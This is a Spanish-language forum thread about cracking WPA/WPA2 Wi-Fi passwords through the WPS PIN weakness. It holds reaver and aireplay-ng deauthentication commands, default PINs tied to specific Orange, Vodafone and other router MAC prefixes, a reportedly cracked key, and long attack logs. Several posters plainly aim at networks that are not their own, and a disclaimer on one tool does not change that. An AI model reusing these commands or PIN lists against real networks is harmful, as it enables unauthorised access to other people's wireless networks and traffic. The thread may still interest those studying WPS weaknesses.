Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 27 Diciembre 2012, 14:02 pm
aireplay 0,desautentificación de cliente

aireplay-ng -0 5 -a MAC AP -c MAC_CLIENTE_ASOCIADO ath0




Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 27 Diciembre 2012, 16:17 pm
magp_90 : He abierto un es post en esta sesion para desbloquear el wps de las orange-xxxx a mi si me ha funcionado tiene que ser con el cliente conectado buscalo lo acabo de poner hacer un rato paso a paso esto lo hizo hispalis. :silbar:


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: magp_90 en 27 Diciembre 2012, 17:56 pm
Elsevi lo acabo de ver, muxas gracias.
Una cosa, ¿como es posible que pongan algunas redes orange_xxxx como vulnerables al reaver si la mayoria se bloquean?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 28 Diciembre 2012, 01:25 am
magp : Muy buena pregunta la verdad que yo tampoco lo se ni lo entiendo pienso que sera que habra algunas orange-xxxx que con algun pin concreto si lo haya sacado pero aora las fte si se suelen sacar, yo la verdad no he sacado ninguna orange-xxxx y mira que yo llevo mas de un año con esto jajaja el dia que saque una hago una fiesta en la puerta de la compañia de orange jajaj :laugh:


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 28 Diciembre 2012, 08:40 am
El wpspin ya viene incluido en la ultima version del wifislax 4.3 y yo ya lo he probado solo vale para mac que este soportodas si no estan dentro de esa listad de mac dentro del programa no sacarais nunca la clave os dara un pin como de prueba por si acaso cuela pero nada mas yo con esto no he sacado niguna orange para lo que kiera sacar las fte le viene muy bien.

No tiene nada que ver con el WPSPin para Android.

Muchachos!

KUESTION!!!!

hace una semana prueba de darle a un mac de Cisco

la primera noche... 8 %
al otro dia... NO ME DEJABA tirarle (constantemente me tiraba el 0x02)
al dia siguiente del dia siguiente... pum!!! RETOMA 14,4 %

ahora... hace una semana que estoy intentandole dar y nada...
puede ser que el router se bloquee??
Es un cisco cuya mac empieza con 68:7f:74

y la opcion que use era
reaver - i mon0 - b LA MAC -vv

NADA MAS!!!!

tambien intente con - L - S - N -d 2 a 5

pero nada!!!

que ondas???
saludos

y los cisco se cuelgan un poco, posibles pin's: 68623227, 42901174..



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: magp_90 en 28 Diciembre 2012, 10:27 am
Ojala que para año nuevo saquen alguna nueva vulnerabilidad en los routers orange xD.....a inicios del 2012 publicaron lo del wps para las claves wpa/wpa2.

Quien sabe??? jajajaja


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 28 Diciembre 2012, 10:47 am
Ojala que para año nuevo saquen alguna nueva vulnerabilidad en los routers orange xD.....a inicios del 2012 publicaron lo del wps para las claves wpa/wpa2.

Quien sabe??? jajajaja


En realidad Fue a principios de Diciembre de 2011.. y el 28 de Diciembre de 2011 salio la versión 1.0 de reaver.



Nueva versión v1.0.4:

* BASE DE DATOS: MAC ADDRESS: #168 PINES: #525.-
* Solucionados 2 Bug de Busqueda de Pin.

(http://i.minus.com/ibfYu0PFEcM1Ve.PNG)

DOWNLOAD: https://sourceforge.net/projects/wpspin/files/WPSPin%20v1.0.4/?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: lekaja en 28 Diciembre 2012, 11:00 am
perdon la ignorancia como puedo usar este programa si estoy en windows 7 salu2 ;D


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 28 Diciembre 2012, 11:05 am
perdon la ignorancia como puedo usar este programa si estoy en windows 7 salu2 ;D

Si te refieres al WPSPin v1.0.4, únicamente o tienes un movil con Android 2.3 o superior o emulas Android con Eclipse.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 28 Diciembre 2012, 17:25 pm
Pandemonium: Yo no me refiero al WPSPIN del androi me refiero a uno que saca las mac soportodas de la fte, wlan_xxxx por cierto ya lo tengo publicado mirar el post funciona bajo linux de todas manera ya viene incluido el wifislax en la ultima version para que lo sepais.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: warcry. en 29 Diciembre 2012, 01:24 am
Nueva versión v1.0.4:

* BASE DE DATOS: MAC ADDRESS: #168 PINES: #525.-
* Solucionados 2 Bug de Busqueda de Pin.

(http://i.minus.com/ibfYu0PFEcM1Ve.PNG)

DOWNLOAD: https://sourceforge.net/projects/wpspin/files/WPSPin%20v1.0.4/?

este viene mas completito que el argentino

WPSPIN. WPS PIN Wireless Auditor. v1.0 (http://wpspin.blogspot.com/)

Generador de PIN por defecto para routers con WPS.

Muy guenas a tod@s !!

Las funcionalidades principales son el scanner de redes wireless y conexión a las redes abiertas.

Sobre las funciones básicas del scanner, contiene autoscan, scan normal a petición, tipos de redes a buscar, búsqueda por WPS, búsqueda por WPS WPA, búsqueda por WPS WPA2, un status de conexión a red y otro de descripción de redes wireless.

Se realiza la conexión a las redes abiertas pulsando sobre la red abierta, para el resto de redes wireless se invoca a la configuración del wifi.

Algoritmo original descubierto por Zaochesung (router Tenda).

Unas fotos de la aplicación.

(http://s.slideme.org/files/screenshots/10/09/752018-588846.jpg?_cid=1355756985)

(http://s.slideme.org/files/screenshots/10/09/752018-588848.jpg?_cid=1355756985)

(http://s.slideme.org/files/screenshots/10/09/752018-588850.jpg?_cid=1355756985)

(http://s.slideme.org/files/screenshots/10/09/752018-588852.jpg?_cid=1355756985)

(http://s.slideme.org/files/screenshots/10/09/752018-593608.jpg?_cid=1356102340)

(http://s.slideme.org/files/screenshots/10/09/752018-593610.jpg?_cid=1356102340)



Aviso legal.

El uso de este producto de software de análisis wireless debe ser una herramienta básica para profesionales y particulares que ansían conocer el nivel de seguridad de sus instalaciones inalámbricas, queda totalmente prohibido el uso de la misma para cometer actos delictivos de intrusión sobre las redes wireless de las cuales no somos propietarios o no tenemos los permisos pertinentes para analizar su nivel de seguridad.


Un saludo.
PD: Como siempre, en algo, habre metido la pata.

enlace al post original para la descarga

http://foro.seguridadwireless.net/aplicaciones-y-diccionarios-otros-plataformas-116/wpspin-wps-pin-wireless-auditor/msg263143/#new

un saludo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 29 Diciembre 2012, 20:41 pm
jajaja pero da cualquiera..  :rolleyes: :rolleyes: :rolleyes: :rolleyes:


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: dakarpesca en 29 Diciembre 2012, 22:05 pm
no funca este programa no escana y te da pin falsos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: warcry. en 30 Diciembre 2012, 00:30 am
no funca este programa no escana y te da pin falsos

jajajaj

eso es porque no sabes de que va la historia. si te molestaras en saber de donde viene el wpspin, igual descubrías que el algoritmo es de zhao Chunsheng y vale para un determinado fabricante de router, que luego se ha probado en los distintos países y se ha visto que hay otros fabricantes que utilizan ese algoritmo de generación de pin por defecto en sus router.

pero no todos los fabricantes utilizan el mismo algoritmo de generación de pines por defecto.

pero como somos unos lamers que no nos molestamos en saber, ni leer de que va la historia, pues criticamos las aplicaciones que saca Arg-wireless.com.ar y seguridadwireless.net

pero nada, ten en cuenta que aquí solo se hacen aplicaciones que no funcan y solo valen para hacer perder el tiempo a pardillos   ;D ;D ;D

mi mas sincero agradecimiento si te hemos hecho perder tu tiempo, ese que no dedicas a adquirir conocimientos.

 ;-) ;-) ;-)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: warcry. en 30 Diciembre 2012, 00:37 am
jajaja pero da cualquiera..  :rolleyes: :rolleyes: :rolleyes: :rolleyes:

sip, siempre te da un pin por defecto en base al algoritmo de zhao,

hay veces que aunque la red sea no soportada, descubres para tu sorpresa que tambien valen, (como una mac de vodafone que en principio no venia en la lista como soportadas, resulta que si saca el pin de ese modelo de router)

por eso se ha dejado que de el pin, aunque a priori no sea bueno, ya que probar un pin, es un segundo, y nunca sabes cuando puede sonar la flauta por casualidad.

el wpspin de arg-wireless en españa los que lo han probado comentan que no es muy efectivo, igual solo tiene una base de datos de redes y routers de argentina.

yo no lo he probado y no te puedo decir la efectividad que tiene, pero todo lo que sean herramientas de auditorias para que nos entretengamos, bienvenidas sean.

y solo queda sacarse el sombrero y agradecer a los autores su esfuerzo

 ;-) ;-) ;-)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 30 Diciembre 2012, 10:16 am
el wpspin para xubuntu idem....como ya he comentado ,al final TODOS LOS CAMINOS CONDUCEN A REAVER...si me preguntasen mi opinión,diría que es una castaña,sin desmerecer el trabajo de nadie...de los pines que he probado(por si sonaba la flauta) ninguno me ha valido...ni siquiera el "genérico"...será porque el firmware de los routers es diferenre...aún así,usando reaver y metiendo -p con los pines,sigue sin rular....lo más curioso es que el mismo pin me pone al 90,91% redes diferentes,las cuales,por probar lo hize,(teniendo el pin) y no se aproxima ni de lejos....
Es posible que el wpspin para android sea "diferente"...lo ignoro,pero vista la efectividad que demuestra(por los comentarios del personal) ni me molesto en probarlo,ni virtualmente...
CONCLUSIÓN:las de orange siguen fuertes,y si reaver no puede directamente,tampoco lo hará ninguna de sus variables,es decir,todos esos scripts,pseudo-programas,etc...finalmente conducen al uso del mismo programa.
Y llevo probando muchos días....
La única orange que he conseguido mover más allá de 10 intentos ha sido con wifite.....pero nada más.
No se puede evitar que haya lamers que lo tengan todo hecho,sobre todo cuando salen a la luz este tipo de "programas"....¿acaso en el 2006 se planteaba usar win2 para ni tan siquiera poner una tarjeta en modo monitor?Hoy por hoy hasta el más tolai con una aplicación viable se hace con una wpa sin tener ni la más remota idea de lo que es un sudo su,o una shell....

pd.El sombrero me lo saco por Craig Heffner,inventor de reaver y por el descubridor del algoritmo empleado en algunos firmwares ,...Zhao Chunseng..  ;) :laugh:


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 30 Diciembre 2012, 10:20 am
el wpspin de arg-wireless en españa los que lo han probado comentan que no es muy efectivo, igual solo tiene una base de datos de redes y routers de argentina.

quien lo dice? el 99% que ha aportado es Español, luego hay gran parte de Italianos, Estadounidenses, etc. Aparte por parte de las compañías procedentes de Argentina, ninguna habilita el WPS. Mira las ultimas que han llegado:

(http://i.minus.com/iNdPFo6bR4Jdh.PNG)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: warcry. en 30 Diciembre 2012, 12:51 pm
quien lo dice? el 99% que ha aportado es Español, luego hay gran parte de Italianos, Estadounidenses, etc. Aparte por parte de las compañías procedentes de Argentina, ninguna habilita el WPS. Mira las ultimas que han llegado:

(http://i.minus.com/iNdPFo6bR4Jdh.PNG)

yo no te puedo aportar datos sobre esas mac que haces referencia mas alla de ver el script de kdtcv y ver si esta soportada o no.

sobre la efectividad o no, supongo que dependerá del tipo de redes que tengas que a tu alrededor, de las mac del cuadro, yo en los alrededores de mi casa no pillo ni una

yo personalmente como te digo no he probado ninguna de las aplicaciones para android, ya que cuando instalo algo, me gusta saber que instalo  ;)

y como de momento no tengo los conocimientos de android suficientes, pues prefiero hacerlo de la manera tradicional.

pd.El sombrero me lo saco por Craig Heffner,inventor de reaver y por el descubridor del algoritmo empleado en algunos firmwares ,...Zhao Chunseng..  ;) :laugh:

pues nada, supongo que luego no iras pidiendo una gui, o un script, ya que solo agradeces al que se curra el algoritmo  :silbar:


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 30 Diciembre 2012, 13:46 pm
Se sabe algo de las redes 90:E6:BA¿¿¿???
Aporto datos de una orange-xxxx con mac C0:AC:54:XX:XX:XX. El pin es 12345670, pero tardo casi 7 horas en lanzar la clave. El router es un sagem y la clave nose cual es porque en el primer intento, me dio una clave de 26 caracteres de numeros y letras en mayuscula :(42A8F6A2CCABF86AA5491ABC42), la meti en windows y tenia acceso ilimitado, fui otra vez a wifislax he inicie el ataque de nuevo, esta vez me dio la clave en 2 horas y la clave era de 8 caracteres (4FCFA142), pero cuando la meti en windows, me salia tambien acceso ilimitado. Siendo una wpa2, cuando metes una clave y te pone acceso ilimitado es que la contraseña es esa, sino no te dejaria conectarte. Alguna ayuda? salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 30 Diciembre 2012, 16:44 pm

pues nada, supongo que luego no iras pidiendo una gui, o un script, ya que solo agradeces al que se curra el algoritmo  :silbar:

 :laugh: :laugh:...muy bueno...,pero no, la interfaz gráfica no la necesito para nada,teniendo la línea de comandos... por eso utilizo xubuntu,instalo los programas que necesito y  los lanzo... que rulan,...bien...que no,pues a seguir probando.
Es lo que tiene linux   ;)



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 30 Diciembre 2012, 17:14 pm
Siento decir por lo que he leeido aqui que wacry lleva razon en parte lo que dice es verdad que estos programas nos pueden ayudar pero no creeo que nunca nos vaya hacer perder el tiempo, lo que pasa que claro hay redes como las orange que las mac no la tienen todavía en estos programa por que no habra dado datos concluyente para que sea la mac soportada de dicha red, tambien es verdad lo que dice malamadre69 a mi tampoco me ha servido la verdad jajaja si desprecia el trabajo de nadie que yo lo agredezco mucho pero tio el tema de las orange llevamos ya mas de 3 años y nada de nada lo que tendriamos que hacer con algunos datos que tengamos sacar algun algoritmo como ya hemos hablado ya que los que crean los programas necesitan tambien datos tambien podriamos nosotros esforzarno por recojer datos y compararlo creanos algun grupo de trabajo. :laugh:

adrihamel: A mi eso datos que pongas hay de ti me creeo muy poco por lo menos pornos el ataque hay para que no lo creeamos mas y que comando metestiste para sacar esa clave cuentanos como los has echo resulta que eres el unico que sacas claves de orange wpa2 mientras los demas lleva años intentandolo y no sacamos nada  :laugh:


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: robeiniesta90 en 31 Diciembre 2012, 18:27 pm
buenas,

no s si cada vez estoy mas cerca o mas lejos,
he usado el reaver 1.4 con un pin que en principio corresponde con el router, el router lo tengo a 3 metros, y me da el siguiente mensaje, que es el mismo sino uso un pin especifico:
;;
la red es vodafoneXXXX, el router hawuei y mac: 28:5F:DB:XX:XX:XX
la antena alfa rtl8147

Se asocia bien.
Trying pin 15872890
Sendind Eapol START request
Sending identity response
Sending M2 Message
WARNING: Last message not processed properly, reverting state to previus message.
WARNING: Out of order packet received, re-transmitting last message.

Sending M2D message  
WARNING: Last message not processed properly, reverting state to previus message.
WARNING: Out of order packet received, re-transmitting last message.
WARNING: Last message not processed properly, reverting state to previus message.
WARNING: Out of order packet received, re-transmitting last message.

Sending WSC ACK
WARNING: Last message not processed properly, reverting state to previus message.

WPS transaction failed , re-trying last pin.
key cracked en 21 seconds.
WPS PIN: 15872890
Nothing done, nothing to save.

a ver si me podeis iluminar.

p.d. el router tiene el wps activado.

saludos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 31 Diciembre 2012, 22:26 pm
@robeiniesta90: Problemaso de la Alfa, jajaj yo tube los mismos problemas y lo solucione usando un AR9271.- es el único chipset que funciona perfecto.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: lekaja en 31 Diciembre 2012, 22:50 pm
@robeiniesta90: Problemaso de la Alfa, jajaj yo tube los mismos problemas y lo solucione usando un AR9271.- es el único chipset que funciona perfecto.
estoy de acuerdo contigo P4nd3m0n1um yo tengo un adaptador igual y va perfecto un salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 31 Diciembre 2012, 23:41 pm

buenas,

no s si cada vez estoy mas cerca o mas lejos,
he usado el reaver 1.4 con un pin que en principio corresponde con el router, el router lo tengo a 3 metros, y me da el siguiente mensaje, que es el mismo sino uso un pin especifico:
;;
la red es vodafoneXXXX, el router hawuei y mac: 28:5F:DB:XX:XX:XX
la antena alfa rtl8147.

Hombre,el chipset rtl8147 no está soportado por reaver....aún así,prueba con el 1.3,por si te has equivocado con el rtl8147....quizás querrías decir rtl8187?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: robeiniesta90 en 1 Enero 2013, 14:06 pm
Hombre,el chipset rtl8147 no está soportado por reaver....aún así,prueba con el 1.3,por si te has equivocado con el rtl8147....quizás querrías decir rtl8187?


exacto, es el rtl8187, la alfa, yo pensaba q esa iba muy bien, pero veo que segun medecis quizas este el problema ahi... lo raro que para otras redes no vodafone si me funciona... eso peude ser? o si me vale para una me deberia valer tambien para la vodafone?

saludos y gracias a los 3 por contestar..


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 1 Enero 2013, 15:28 pm

exacto, es el rtl8187, la alfa, yo pensaba q esa iba muy bien, pero veo que segun medecis quizas este el problema ahi... lo raro que para otras redes no vodafone si me funciona... eso peude ser? o si me vale para una me deberia valer tambien para la vodafone?

saludos y gracias a los 3 por contestar..

Claro, cada red es diferente, cada fabricante lo realiza a su estilo, yo tengo redes que ni con un AR9271 puedes romper y bueno.. va a quedar así..


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 1 Enero 2013, 15:42 pm
personalmente sólo puedo decirte que ese chipset lo llevo usando años...en sus diferentes "carcasas" y sí que he conseguido juakear un par de vodafone con reaver,pero ninguna con ese bssid....

échale un ojo a este enlace,y fíjate en el nº 78 y 79 de los dispositivos...aunque el firmware es desconocido,sí que la versión 1.3 y la 1.1 han sido efectivas....

https://docs.google.com/spreadsheet/ccc?key=0Ags-JmeLMFP2dFp2dkhJZGIxTTFkdFpEUDNSSHZEN3c#gid=0


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: robeiniesta90 en 1 Enero 2013, 20:04 pm
vaya semanas llevo, jje, no doy con la tecla, lo raro es que todo en principio va de lujo,

acabo de probar con wpscrackgui y wpspingenerator, y detectan la red, detecta que tiene wps, el pingenerator hasta me da el pin, al igual q el wpspin. pero a la hora de ejecutar el reaver se queda reintentando el mismo pin, me dice q la transaccion de wps ha fallado....

el router esta a 3 metros...

mi portatil tiene una ipw2200 de serie, pero no me deja ponerla en modo monitor :(, es mas el wifislax 4.3 por ejemplo ni me la reconoce...

alguna idea q puede estar pasando:

malamadre, ya vi esa pagina y nada, gracias de todas formas.

saludoso.

p.d. por que peude ser q la ipw2200 no me la reconozcan?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 1 Enero 2013, 22:33 pm
claro que puede ser,en alguna parte leí que había que parchearla...yo también tengo una ipw2200 y mira cuando intento ponerla en modo monitor....o lanzando el wash
básicamente me dice que se han encontrado 4 procesos que pueden ser causa del problema,y si airodump,aireplay o airtun se paran después de un rato,matar los procesos ...
Así que opté por las antenas via usb :laugh:

~$ sudo airmon-ng start eth1


Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID   Name
808   NetworkManager
814   avahi-daemon
821   avahi-daemon
917   wpa_supplicant


Interface   Chipset      Driver

eth1      Intel 2200BG/2915ABG   ipw2200 - [phy0]mon0: ERROR mientras se obtenían las banderas de interfaz: No existe el dispositivo

            (monitor mode enabled on mon0)

bassassin:~$ sudo wash -i mon0

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[X] ERROR: Failed to open 'mon0' for capturing

échale un ojo a este enlace y suerte

http://forum.aircrack-ng.org/index.php?topic=8497.0


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: g3nh4ack en 1 Enero 2013, 23:12 pm
Yo tengo una duda con este método. Una vez que rompes, ¿la clave que te da es la predeterminada por el router o te da la que tenga en ese momento si la ha cambiado?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 1 Enero 2013, 23:26 pm
g3nh4ack: Depende lo mismo te puede dar la clave por defecto o la clave cambiada del router por una personal. >:D


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: g3nh4ack en 2 Enero 2013, 01:38 am
¿Pero cómo que depende? ¿Depende del humor del Reaver ese día? ;D Bueno, en todo caso llevo ya 8 horas pasandolo a mi red con la clave cambiada, ya veremos que me da cuando termine. De todas maneras, el termino depende es algo que no me sirve cuando hablamos de informatica...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 2 Enero 2013, 01:53 am
Vamo haber g3nh4ack cuando te digo depende es que depende de la clave que tu le hayas metido a tu router si le has dejado la clave que tenia por defecto evidentemente te sacara esa clave si se lo has cambiado personalmente tu pues te sacara la clave personal que tu le has cambiado el wpscragui tanto como el reaver te saca la clave atraves del pin que sea correcto nada mas no hay mas.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: robeiniesta90 en 2 Enero 2013, 09:39 am
claro que puede ser,en alguna parte leí que había que parchearla...yo también tengo una ipw2200 y mira cuando intento ponerla en modo monitor....o lanzando el wash
básicamente me dice que se han encontrado 4 procesos que pueden ser causa del problema,y si airodump,aireplay o airtun se paran después de un rato,matar los procesos ...
Así que opté por las antenas via usb :laugh:

~$ sudo airmon-ng start eth1


Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID   Name
808   NetworkManager
814   avahi-daemon
821   avahi-daemon
917   wpa_supplicant


Interface   Chipset      Driver

eth1      Intel 2200BG/2915ABG   ipw2200 - [phy0]mon0: ERROR mientras se obtenían las banderas de interfaz: No existe el dispositivo

            (monitor mode enabled on mon0)

bassassin:~$ sudo wash -i mon0

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[X] ERROR: Failed to open 'mon0' for capturing

échale un ojo a este enlace y suerte

http://forum.aircrack-ng.org/index.php?topic=8497.0

exacto, ese es el fallo que me da.
probaré ese enlace que me das.. auque parece que no funciona a muchos... jeje

gracias de nuevo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 2 Enero 2013, 10:08 am
exacto, ese es el fallo que me da.
probaré ese enlace que me das.. auque parece que no funciona a muchos... jeje

gracias de nuevo.

Instalaste el driver? y los compat?

Recomendación: NO usar internas!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: g3nh4ack en 2 Enero 2013, 11:44 am
Vamo haber g3nh4ack cuando te digo depende es que depende de la clave que tu le hayas metido a tu router si le has dejado la clave que tenia por defecto evidentemente te sacara esa clave si se lo has cambiado personalmente tu pues te sacara la clave personal que tu le has cambiado el wpscragui tanto como el reaver te saca la clave atraves del pin que sea correcto nada mas no hay mas.

Me he expresado mal en mi pregunta. Intentaba referirme a qué clave busca una vez  la cambias, si la predeterminada anterior o la nueva personal. Creía que lo habías entendido, de ahi mi repuesta


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ivigo91 en 2 Enero 2013, 14:23 pm
hola a todos.Soy nuevo aqui y llevo tiempo mirando este tema del foro.
tengo dos problemilla:en uno de los ruters que uso de prueba me da el error 0x03 y he probado todo tipo de parametros en el comando de reaver.
en el otro ruter me aparece el error receive timeout  occurred en el M6 aunke continua el porcentaje por encima del 90% asta el 99%(nunka al 100%) y no encuentra nada.eso si,cambia de pin cada vez.Ya no se ni que cambiar en ninguno de los dos casos... :huh:


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: robeiniesta90 en 2 Enero 2013, 14:31 pm
Instalaste el driver? y los compat?

Recomendación: NO usar internas!

no, lo raro es que ni aparece en algunas distro, como podria instalar el driver?

saludos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ivigo91 en 2 Enero 2013, 21:16 pm
Sending WSC NACK
  • Trying pin 12349982
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • Received M1 message
  • Sending M2 message
  • Received M3 message
  • Sending M4 message
  • Received M5 message
  • Sending M6 message
  • [!] WARNING: Receive timeout occurred
  • Sending WSC NACK
  • Trying pin 12349982
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • Received M1 message
  • Sending M2 message
  • Received M3 message
  • Sending M4 message
  • Received M5 message
  • Sending M6 message
  • [!] WARNING: Receive timeout occurred
  • Sending WSC NACK

se planta en 90% y empieza con esto.va relativamente rapido hasta el 99% cambiando de pin pero dando siempre ese error.llega al 99 y repite el pin.Use todas las opciones del comando reaver y nada.estoy deskiciado  :rolleyes:


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 2 Enero 2013, 23:47 pm
no, lo raro es que ni aparece en algunas distro, como podria instalar el driver?

saludos.

http://www.aircrack-ng.org/doku.php?id=ipw2200  :silbar:


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: robeiniesta90 en 3 Enero 2013, 11:27 am
http://www.aircrack-ng.org/doku.php?id=ipw2200  :silbar:

gracias, lo pruebo esta noche si tengo tiempo, y te cuento.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: pachubi en 3 Enero 2013, 13:15 pm
Hago un consulta de quién me pueda ayudar, a mi me llega hasta el pin 09990005 y me lo empieza a repetir y no sale de ahí, cubriendo un 90.90% ya lo he realizado 3 veces y siempre lo mismo quisiera saber que es lo que debo hacer o porque pasa esto, gracias. espero una respuesta.
Lo realizo con el Reaver 1.4 en una iso desde unidad usb, (aclaro que ya he sacado contraseñas WPA2-PSK).


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 4 Enero 2013, 00:23 am
 ASOT550: aqui un pequeño aporte de otro foro que vii lo pongo aqui para que probes haber si os sirve. ::)

ESSID: WLAN_XXXX

BSSID: 30:39:F2:XX:XX:XX

MODELO: �

V. Firm: �

Wps Activado: Si

Inicio PIN: 1670@@@@ // 4329@@@@ // 16538061* // 1340@@@@ // 8820@@@@

*pin confirmado


essid > orangeXXXX
modelo >
versión firmware >
bssid >  50:7E:5D:XX:XX:XX
WPA> 10 caracteres hexadecimales (mayúsculas)
WPS> 4255@@@@

¡WPS activado por defecto!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 4 Enero 2013, 01:07 am
He podido observar pin a pin la secuencia que utiliza reaver una vez obtenidos los cuatro primeros dígitos.
Continúa incrementando de uno en uno con los tres siguientes, y 7 unidades el último ,es decir....XXXX1001,XXXX1018,XXXX1025....pensé que era un patrón..
11113669
11113676
11113683
11113690
11113707

pero también he observado que a veces( creo que de forma aleatoria...ignoro la razón )no sigue esta secuencia en el ultimo numero,sino que en un momento dado lo incrementa en 6 (en vez de 7) el siguiente pin,sólo una vez,para volver a sumar de 7 en 7 otra vez .... pero siempre incrementa de uno en uno los tres siguientes números,respetando esa secuencia,sin dejar ni una...

11116295
11116301
11116318
11116325

Cuando pasa esto
 99.98% complete @ 2013-01-04 00:35:08 (8 seconds/pin)
  • Trying pin 11119975
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • Received M1 message
  • Sending M2 message
  • Received M3 message
  • Sending M4 message
  • Received WSC NACK
  • Sending WSC NACK
  • Trying pin 11119982
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • Received M1 message
  • Sending M2 message
  • Received M3 message
  • Sending M4 message
  • Received WSC NACK
  • Sending WSC NACK
  • Trying pin 11119982
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • Received M1 message
  • Sending M2 message
  • [!] WARNING: Receive timeout occurred
  • Sending WSC NACK
  • [!] WPS transaction failed (code: 0x02), re-trying last pin

  • Trying pin 11119982
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • Received M1 message
  • Sending M2 message
  • [!] WARNING: Receive timeout occurred
  • Received M1 message
  • Sending WSC NACK
  • Sending WSC NACK
  • [!] WPS transaction failed (code: 0x03), re-trying last pin
  • Trying pin 11119982
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • Received M1 message
  • Sending M2 message
  • Received M3 message
  • Sending M4 message
  • Received WSC NACK
  • Sending WSC NACK
  • 99.99% complete @ 2013-01-04 00:35:38 (8 seconds/pin)
  • Trying pin 11119982

Y así sigue hasta qwue paro la consola,probando el último pin en un bucle infinito....

En realidad le falta por probar el pin 11119999 ó el 11119998 por lo que he observado de sumar 6 aleatoriamente,y reaver no prueba estos pines,por eso se queda al 99,99%

Así que probé metiendo el primero de los que faltaban...mas de lo mismo

  • 90.95% complete @ 2013-01-04 00:47:45 (4 seconds/pin)
  • Trying pin 11119999

Quise meter el otro,pero no había manera,por alguna razón,siempre empezaba con el 11119999...me quedé observando un rato y veo que prueba siempre el mismo pin,pero el porcentaje va incrementándose,como si lo hiziese probando con pines diferentes

 90.94% complete @ 2013-01-04 00:52:50 (10 seconds/pin)
  • Trying pin 11119999
  • 90.98% complete @ 2013-01-04 00:53:08 (6 seconds/pin)
  • Trying pin 11119999
  • [!] WPS transaction failed (code: 0x03), re-trying last pin
  • 91.01% complete @ 2013-01-04 00:53:38 (7 seconds/pin)
  • Trying pin 11119999
  • [!] WPS transaction failed (code: 0x02), re-trying last pin
  • 91.04% complete @ 2013-01-04 00:53:59 (7 seconds/pin)
  • Trying pin 11119999
  • 91.07% complete @ 2013-01-04 00:54:25 (7 seconds/pin)
  • Trying pin 11119999
  • Sending EAPOL START request
